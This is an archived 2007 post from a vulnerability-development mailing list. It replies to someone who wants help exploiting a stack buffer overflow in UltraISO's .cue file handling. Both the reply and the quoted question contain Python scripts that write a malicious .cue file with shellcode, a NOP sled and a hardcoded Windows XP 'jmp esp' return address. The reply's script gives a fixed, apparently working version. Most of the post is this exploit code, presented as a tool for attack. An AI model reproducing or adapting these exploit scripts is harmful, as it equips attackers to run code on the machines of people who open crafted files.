Vulnerability Development mailing list archives
Re: Help developing exploit
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Mon, 28 May 2007 16:34:50 +0200
Hi, try to return to a "jmp esp", also pick one that doesn't result in an invalid file format. e.g. import struct scode=( "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" "\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57" "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38" "\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48" "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54" "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53" "\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37" "\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a" "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b" "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43" "\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" "\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49" "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" "\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a" ) cue='FILE "' cue+='B'*1099 #77f84143: ff e4 jmp *%esp #had to try a few to get a good one cue+=struct.pack('<L',0x77f84143) cue+=scode cue+='.bin" BINARY\n' cue+=' TRACK 01 MODE1/2352\n INDEX 01 00:00:00' cue_file = open("xpl.cue","w") cue_file.write(cue) bin_file = open("xpl.bin","w") Regards, Thomas Pollet On 26 May 2007 17:32:12 -0000, KaCo678 () aol com <KaCo678 () aol com> wrote:
Hi i was wondering if you would able to help.//I recently found a stack over flow in Ultra iso and was trying to write a local exploit for it..But im able to find the address where my nop sled is and every thing ive tried hasnt worked..And well as you seam to be a well respected member of the community you might be able to help me...Ive asked a few people for help with this one,,But still no further forward..Ill explain the best i can..Im able to control the ecx register and eip ..I attach aolly dbg and open the cue file..And the program crashes my eip points to 90909090 nop sled lol then i press shift + f9 and then i can write any thing i want to the eip so for testing i wrote 41424344 which then wrote to the eip and ecx register..At 3299 bytes then the 4 bytes to write to the registers..Ive provided a little test script..Its a mess but its just for testing m8..also worth noting that we still have to actually fill the rest of the file ..So altogether we have 5004 bytes to
th
e file..I hope im making sence i was guna use bouncing shared library's method..But not sure i changed the eip to the address of 0x7C80C75B jmp ebp as my nops where in there some where...Ive wrote a python script im using to test it ...Also if you do take a look you will need to create a fake bin file in the same directory..Any help would be great thnx for your time. #!/usr/bin/python ### import sys import struct import time head_file = "\x46\x49\x4c\x45\x20\x22" #Header of file buffer1 = "\x90" * 4000 #4000 nops nop = "\x90" * 189 #189 nops shell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" # 110 bytes shell code shell += "\x77\x1d\x80\x7c" shell += "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb" shell += "\x28\xac\x80\x7c" shell += "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51" shell += "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff" shell += "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" shell += "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" shell += "\xff\x4f\x6d\x65\x67\x61\x37\x4e" fuck = "\x90" * 2 #lost 2 bytes some where made it up lol offset = "\x41\x42\x43\x44" buffer2 = "\x45" * 701 #fill the rest of the file with junk Head_end = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20" #end of file. Head_end += "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32" Head_end += "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31" Head_end += "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30" cue_file = open("1.cue","wb") cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end) cue_file.close() Im very confused at the moment as a few people have told me a few ways to exploit this lol..But im still learning..I was wondering could i just not point my eip to my nop sled..So my shell code gets executed..Im working with windows xp sp2/..Just cant seam to get to the adress of my nop code/
Current thread:
- Help developing exploit KaCo678 (May 26)
- Re: Help developing exploit Valdis . Kletnieks (May 26)
- Re: Help developing exploit Thomas Pollet (May 28)
- <Possible follow-ups>
- Re: Re: Help developing exploit KaCo678 (May 27)
- Re: Help developing exploit Valdis . Kletnieks (May 27)
- Re: Re: Help developing exploit KaCo678 (May 27)